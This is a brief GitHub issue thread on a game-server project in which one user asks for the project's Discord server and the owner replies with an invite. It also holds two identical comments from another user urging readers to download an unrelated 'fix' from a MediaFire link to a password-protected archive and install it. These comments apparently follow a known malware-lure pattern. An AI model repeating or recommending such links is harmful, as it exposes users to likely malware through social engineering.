### ISSUE TITLE
Discord server of ero?

### ISSUE THREAD

**Issue by boostedcc** [MarvelcoOGFN/Ero-gameserver#1]

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by MarvelcoOGFN** [comment]
> _No description provided._

https://discord.gg/KdVw8MrR5g
